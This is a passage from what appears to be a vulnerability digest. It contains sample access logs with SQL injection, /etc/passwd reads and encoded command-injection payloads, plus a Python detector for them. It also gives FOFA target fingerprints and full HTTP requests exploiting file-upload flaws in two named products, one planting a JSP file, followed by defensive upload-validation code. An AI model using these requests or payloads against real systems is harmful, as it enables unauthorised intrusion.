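10.0.0.6 - - [05/Jun/2024:10:02:15 +0800] "GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1" 200 87 "-" "Mozilla/5.0"
10.0.0.7 - - [05/Jun/2024:10:03:30 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.8 - - [05/Jun/2024:10:04:41 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 64 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Jun/2024:10:05:00 +0800] "GET /index.php?id=42 HTTP/1.1" 200 1500 "-" "Mozilla/5.0"
"""

# Method, target and protocol out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

# Indicator classes, matched against the fully decoded target. Each regex is
# generalised a little beyond the literal payloads above (any UNION SELECT,
# any backtick-wrapped command), so expect some tuning on real traffic.
INDICATORS = [
    ("time-based SQLi", re.compile(r"waitfor\s+delay|\bsleep\s*\(|randomblob\s*\(", re.I)),
    ("union SQLi", re.compile(r"union\s+(?:all\s+)?select\b", re.I)),
    ("file read / traversal", re.compile(r"file:///|/etc/passwd|(?:\.\./){2,}", re.I)),
    ("command injection", re.compile(r"`[^`]+`|;\s*(?:uname|id|whoami|cat|ls)\b", re.I)),
]


def decode_target(target: str) -> str:
    """Percent-decode twice (catches one level of double encoding) and turn '+'
    into spaces, so indicators hidden by URL encoding are visible to the regexes."""
    return unquote_plus(unquote_plus(target))


def scan_line(line: str):
    """Return [(indicator, path, matched_text), ...] for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    decoded = decode_target(m.group("target"))
    path = decoded.split("?", 1)[0]
    hits = []
    for name, pattern in INDICATORS:
        found = pattern.search(decoded)
        if found:
            hits.append((name, path, found.group(0)))
    return hits


def scan_log(text: str):
    """Scan a whole log; returns [(line_no, indicator, path, matched_text), ...]."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, path, matched in scan_line(line):
            findings.append((line_no, name, path, matched))
    return findings


if __name__ == "__main__":
    for line_no, name, path, matched in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {name:<22} {path}  <- {matched!r}")
```

Decoding before matching is the important step: entry 198's payload is entirely percent-encoded and entry 197's spaces arrive as `+`, so a regex run over the raw request line misses both. Grouping hits by the decoded path also gives the list of exposed endpoints to compare against the FOFA fingerprints above.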
202. 微擎 AccountEdit arbitrary file upload
FOFA: body="/Widgets/WidgetCollection/"
Step 1. Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Step 2. Substitute the __VIEWSTATE and __EVENTVALIDATION values into the upload form (the 上传图片 line is the submit button's value and must be sent as-is):
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then served at /_data/Uploads/1123.txt
203. 红海云 (Redsea) EHR PtFjk file upload
FOFA: body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

The part declares image/jpeg while the file name ends in .jsp: the server trusts the client-supplied type and stores the JSP.
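Entries 192, 194, 199, 202 and 203 are the same upload flaw in different dress: the server takes the file name (or, in 192, a separate name parameter), the extension and the Content-Type from the request and stores the result under the web root. The Python below is an added example for this digest, not code from the source article or from any vendor listed: it puts the unsafe path construction next to a validation routine that keeps only the base name, allowlists the extension, checks the leading bytes against the type the name claims and stores under a random name. UPLOAD_ROOT, the allowlist and the magic-byte table are assumptions for the example, not values from any product above.

```python
import posixpath
import secrets

# Assumed storage root for the example; not a path from any product named above.
UPLOAD_ROOT = "/srv/app/uploads"

# Only passive image/document types are accepted; anything a web server or
# servlet container could execute (.jsp, .php, .ashx, .aspx, ...) is simply absent.
ALLOWED_EXT = {".jpg", ".png", ".gif", ".pdf"}

# Leading bytes a file of each accepted type must start with (assumed table).
MAGIC = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
    b"%PDF-": ".pdf",
}


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def vulnerable_target_path(filename: str, upload_root: str = UPLOAD_ROOT) -> str:
    """The pattern behind entry 194: the client-supplied file name is joined to
    the upload directory as-is, so '../' segments walk out of it."""
    return posixpath.normpath(posixpath.join(upload_root, filename))


def sniff_extension(data: bytes):
    """Return the extension implied by the file's magic bytes, or None."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def validate_upload(filename: str, data: bytes, declared_content_type: str = None):
    """Return (stored_name, target_path) for an acceptable upload, else raise.

    declared_content_type is deliberately not used for the decision: the client
    sets it (entry 203 sends image/jpeg with an 11.jsp body)."""
    # Keep only the base name; handles both '/' and Windows '\\' separators.
    base = posixpath.basename(filename.replace("\\", "/"))
    if base in ("", ".", "..") or "\x00" in base:
        raise UploadRejected("empty, dot or NUL-containing file name")
    ext = posixpath.splitext(base)[1].lower()
    if ext == ".jpeg":
        ext = ".jpg"
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f"extension {ext or '(none)'} is not allowed")
    sniffed = sniff_extension(data)
    if sniffed != ext:
        raise UploadRejected(f"content starts like {sniffed}, name claims {ext}")
    # Random stored name: the client never chooses where or as what the file lands.
    stored = secrets.token_hex(16) + ext
    target = posixpath.join(UPLOAD_ROOT, stored)
    assert posixpath.dirname(target) == UPLOAD_ROOT
    return stored, target


def is_rejected(filename: str, data: bytes, declared_content_type: str = None) -> bool:
    """Convenience predicate: True when validate_upload refuses the input."""
    try:
        validate_upload(filename, data, declared_content_type)
    except UploadRejected:
        return True
    return False


if __name__ == "__main__":
    # The file name from entry 194 escapes the upload directory under the naive join...
    print(vulnerable_target_path("../../../../../jboss/web/fe.war/hello.jsp"))
    # ...and is refused outright by the validator.
    print(is_rejected("../../../../../jboss/web/fe.war/hello.jsp", b'<% out.println("hello");%>'))
```

The order of checks matters less than what is never consulted: the validator reads nothing from the request except the base name's extension, and even that only selects among allowlisted types whose bytes must agree. Serving the upload directory with script execution disabled is the second layer, in case the first one is bypassed.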
